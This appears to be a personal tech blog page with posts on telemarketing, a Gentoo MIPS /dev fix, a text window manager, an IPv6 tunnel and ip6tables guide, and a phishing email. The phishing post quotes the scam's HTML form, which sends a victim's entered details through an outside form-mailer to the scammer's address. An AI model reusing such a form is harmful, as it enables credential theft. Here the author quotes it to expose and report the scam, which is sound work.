Redhatter’s Web Blog

Yep, I’m sure everybody knows what I’m on about… it’s those annoying people, that ring just as you’re about to take a bite of your hot dinner … or wake you up/disturb you in the middle of the day, to sell you something you’re not interested in.

I’ve endured it for quite some time now. Somebody rings on the landline phone (thankfully they haven’t touched my mobile), and starts their marketing blurb. Sometimes they’ll ask for a “Mr Longland” … and after further probing, maybe I can get a “D G Longland” out of them (being my father’s phone line, he’s listed in the phonebook, and this is where they get the number from). Depending on my mood, I’ll either be highly synical or flippant, or I’ll play dumb.

Each time it happens though, I still can’t help but think … they’re doing it all wrong. Just because a number is in the phone book … that doesn’t instantly give them the right to use it to make an unsolicited commercial phonecall. At the moment for us here in Australia, there are two options:

• Request our number to be made silent. This would prohibit anyone from publishing your phone number basically. But this wouldn’t stop those call centres that just hit +6173 then throw 7 more random digits on the end. It’s also an inconvenience for people who know us.
• Get added to the ADMA Do Not Call List. Now this will help cull calls from crowds that are a member of this association … but what about others?

I thus propose another solution.

Rather than just calling anyone, then having people opt-out of the service… instead… people should opt-in to receiving calls. This is how it’d work.

1. A telemarketing company puts out an advert in the media (radio, TV, newspapers…etc.), listing possible service areas that people might be interested in, as well as a phone number for people to contact for more information. Let’s say for the example, this crowd are in contact with mobile phone carriers, internet providers, mortgage crowds, and a few other companies.
2. People who are interested then ring this number. An operator (or a computer) answers, and gives them the rundown of the services available.
3. The caller then selects the services they want, along with specifying a preferred contact phone number and times to call.
4. The company then adds the caller to their call-list.

This has a number of advantages:

• Their people no longer get abused by people who aren’t interested.
• They pay less to run the companies, because fewer calls are wasted.
• Customers here about the services they are interested in, and may attract more by word-of-mouth.

Disadvantages:

• There’s an additional cost to pay for adverts (which is offset by fewer calls)
• Harder for new players to become established.

Maybe if companies took this approach… fewer people would be needlessly disturbed… and they might become more successful as a result.

Yep… it’s that time again, the time when we’re going from one end of town, to the other, visiting numerous relatives and attending many christmas parties over the silly season.

Stinking hot weather … time with the family… perfect waterfight weather actually.

This also means I’ll be on a somewhat limited internet connection (last year, I had none at all; the phone line was that bad) and so may be partially or completely unavailable. Hopefully nothing will break in my absense, and we’ll be right.

I’ll try to be online if I can; won’t be as available, but I’ll have logging going on my IRC session on toucan (nick: Redhatter-DGO on FreeNode and AustNET; Redhatter- on irc.oz.org because they’re stingy on nickname lengths). Due to the limited bandwidth, I won’t be doing much with CVS … SSH will be bad enough.

Anyways, that is all from this part of the world. Gentoo/MIPS handbook is still under review; I’ll try and make a static version of it available in my devspace shortly in case (heaven forbid) our server goes down (like it did yesterday; after a nasty storm took out our electricity for 4 hours). Other than that… Merry Christmas; see you on Boxing Day, if not before.

Hi All,
It has been discovered that the latest 2005.1 stages appear to be missing critical /dev entries. To work around the issue… execute the following commands before exiting the chroot environment:


# cd /dev
# /sbin/MAKEDEV generic-mipsel


This should create the necessary device nodes. I shall look at rectifying the issue ASAP. Stay tuned.

I’ve been using screen for a little while now. It’s a brilliant little package, but it does have some shortcomings. One being, you can only be viewing one app at a time… and it takes a little getting used to.

Anyway, I happened to mention this in #humbug (irc.oz.org)… and how it’d be nice to have an ncurses workalike that used gpm and/or keystrokes, to move text windows around. Much like having a bunch of xterms on a console. One of the people pointed me to twin a text-based window manager.

(the Text WINdow Manager in action, with elinks running locally, and irssi running within a ssh session)

I’m an instant convert… now to see if this can be loaded onto dev.gentoo.org.

After some tinkering today, I managed to figure out the wonderous black art that is IPv6. Now I get to discover the Internet that IPv4 user’s don’t see.

How does one get hooked up to IPv6? Well, if your ISP doesn’t support it, then you have to establish an IPv6-in-IPv4 tunnel with an IPv6 broker. Since I’m in Australia, naturally, I set up an account with AARNet, and requested a tunnel through them.

Gentoo have a nice little guide, that steps users through setting up with either 6Bone or Freenet6… however it seems AARNet do things slightly differently.

The way I set things up was as follows…

Connecting a host to IPv6 via AARNet

Before we start, you’ll want to make sure you’ve got IPv6 support in your kernel. If you see a directory called /proc/sys/net/ipv6, then chances are good, you’ve got what it takes.

First, create an account. This is the username and password you’ll use to request the tunnel later. You’ll be emailed a system generated password. You only get one, and there’s no password changing facility (that I can see), so it would be adventageous to keep this email safe.

Next, fill out this form. If you’re just wanting to hook up a single host, then ignore the “Request for /48 prefix”. Otherwise, you’ll need to check that box — in the “Interface Name” field, enter the interface name for your internal LAN interface (e.g. eth1 in my case). You’ll then be asked for your username and password before downloading a setup shell script (linux.sh if you selected Linux).

Now, Place this linux.sh somewhere convenient. I stuffed it into /etc/setup-ipv6. This script is what you’ll use to establish the tunnel. I call it from my /etc/conf.d/local.start (rc.local for those playing along with other distributions), so my tunnel is established at boot.

Right, with that over, it’s now time to install the tools necessary. On Gentoo, simply USE=ipv6 emerge iputils iproute2 freenet6 — Freenet6 use the exact same tools. Other distributions, AARNet provide the tools from their front page. You’ll also want iproute2, and a version of iputils with IPv6 support.
Gentoo users may find it adventageous to set USE=ipv6 in their /etc/make.conf, and update their system so that they can make use of IPv6 support in any applications able to utilise it.

Lastly, we need to configure tspc, the tunnel client. On Gentoo, edit /etc/freenet6/tspc.conf (just hack up the example config). Place in there, the username and password you were given from AARNet, and down the bottom, change the server= line to read broker.aarnet.net.au. You’ll also want to edit the linux.sh file, to make sure the directories mentioned are correct, in particular, TSP_HOME_DIR should point to the directory containing tspc.conf.

And now we’re ready to bring up the tunnel. Run sh linux.sh (or whatever you ended up calling it). You should see something like this…

(23:32) www ~ # /etc/setup-ipv6
--- Start of configuration script. ---
Script:  setup-ipv6
sit1 setup
Setting up link to 202.158.196.131
This host is: 2001:0388:f000:0000:0000:0000:0000:0279/
Adding default route
Router configuration
Kernel setup
net.ipv6.conf.all.forwarding = 1
Adding prefix to eth1
Starting radvd: /usr/sbin/radvd -u radvd -C /etc/freenet6/tsprtadvd.conf
--- End of configuration script. ---
(23:32) www ~ # _

You’re now running IPv6. Go on, get out there… explore. To check you’re really browsing IPv6, try pointing an IRC client at irc.ipv6.freenode.net (Ohh, and don’t forget to pop in to one of the Gentoo channels and say Hi ;-)), or point your web browser at the KAME website. If you’re running IPv6, their tortise should be dancing (it’s an animated GIF). You can also try pinging various sites such as irc.ipv6.freenode.net or www.kame.net using the ping6 utility.

Sharing the love

So, suppose you asked for a /48 prefix, and you’ve got a bunch of machines sitting behind the router that you want on IPv6 too. Easy fixed. You’ve got a couple of options. One is to set up dhcpv6, or the other, is to simply use radvd. The latter works out of the box, the tunnel script automatically configures radvd for you.

On Gentoo, simply emerge radvd. Then restart your tunnel script. It should start radvd, and within a few seconds, the other machines on your network should receive the route/adressing advertisments, and automatically configure themselves for IPv6.

This is only half of the story though … You then have to enable IP forwarding on your server. (Sound familiar? Should do… same as IPv4).
Simply run echo 1 > /proc/sys/net/ipv6/conf/default/forwarding, and you should see the packets start flowing.

Keeping the nasties out

Now that you’ve got routing set up, it’s time to lay down the law regarding firewall rules. Quite obviously, you don’t want the outside riffraff upsetting your delicate hardware unless it’s got a specific invitation to do so. Make sure you’ve got netfilter6 support in your kernel, and the ip6tables utility. (distributed with iptables)

At the moment, there’s no connection tracking in IPv6, nor is there any network address translation (which is unnecessary on IPv6 anyways). The following is what I use for my firewalling rules, adapt to taste.

# Generated by ip6tables-save v1.3.2 on Sun Sep 11 23:57:08 2005
*mangle
:PREROUTING ACCEPT [16827:6712869]
:INPUT ACCEPT [1297:98415]
:FORWARD ACCEPT [15530:6614454]
:OUTPUT ACCEPT [1629:131392]
:POSTROUTING ACCEPT [17230:6752830]
COMMIT
# Completed on Sun Sep 11 23:57:08 2005
# Generated by ip6tables-save v1.3.2 on Sun Sep 11 23:57:08 2005
*filter
# By default, drop anything comming in or through us.
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
# Allow all ICMP traffic
-A INPUT -s ::/0 -d ::/0 -p ipv6-icmp -j ACCEPT

# Local LAN interfaces (note, since I'm behind an ADSL router, all my interfaces are private, except sit1)
-A INPUT -s ::/0 -d ::/0 -i eth+ -j ACCEPT

# Allow SSH and IRC connections (I'd open more, but I'll need DNS working first)
-A INPUT -s ::/0 -d ::/0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s ::/0 -d ::/0 -p tcp -m tcp --dport 6667 -j ACCEPT

# Forwarding rules...
# Allow internal traffic OUT
-A FORWARD -s ::/0 -d ::/0 -i eth+ -j ACCEPT

# Allow established connections back IN
-A FORWARD -s ::/0 -d ::/0 -i sit1 -o eth+ -p tcp -m tcp ! --tcp-flags SYN,RST,ACK SYN -j ACCEPT

# Allow ICMP traffic
-A FORWARD -s ::/0 -d ::/0 -p ipv6-icmp -j ACCEPT

# Log anything else
-A FORWARD -s ::/0 -d ::/0 -j LOG --log-prefix "FORWARD IPv6: "
COMMIT
# Completed on Sun Sep 11 23:57:08 2005

It’s a crude firewall, but it works.
The above guide, is far from being perfect, but hopefully my notes above will assist others in migrating to IPv6.

My god… never thought a spammer would be this stupid.

Okay, we’ve all heard of phishing I’m sure… and unfortunately in this day & age, it’s nothing unusual. However, normally it involves clicking a link, which takes you to a website where you enter your precious details.

Not this one. This one is the first I’ve seen of its kind. Here’s a screenshot of the offending email.  Update 20080325 — I lost the screenshot in an upgrade of the blogging software (yes, foolish me)

It’s a form. Okay, pretty smart you say… It would be, had the individual not used his/her email address in one of the hidden fields of the form. It in fact, uses a form-mailing script, and emails the form to the scammer’s email address. Here’s the relevant snippet of code (note, this is in quoted-printable encoding, I can’t be arsed fixing that.):

<FORM name=3Dform1
action=3Dhttp://webtools.snip.net/FormHandler.ashx method=3Dpost
target=3D_blank><INPUT type=3Dhidden value=3Dssconturi@yahoo.com
name=3Dxto> <INPUT type=3Dhidden value=3DAPACHE name=3Dxfrom> <INPUT
type=3Dhidden value=3DUSER name=3Dxsubject> <INPUT type=3Dhidden
value=3Dhttp://pages.ebay.com/services/buyandsell/welcome.html
name=3Dxredirect>

Notice the user’s email address? A nice letter went out to Yahoo today, as well as the ISP where the email originated, and the tech support for Snip.net, and hopefully they’ll act on this.

For those thinking of trying this sort of stunt… forget it. I seem to have a real habit of accidentally forwarding such emails to spoof@<company>… and they don’t like it when they hear someone impersonating them. For those who have received such an email… have a look on the company’s real website for places where to report the spammer.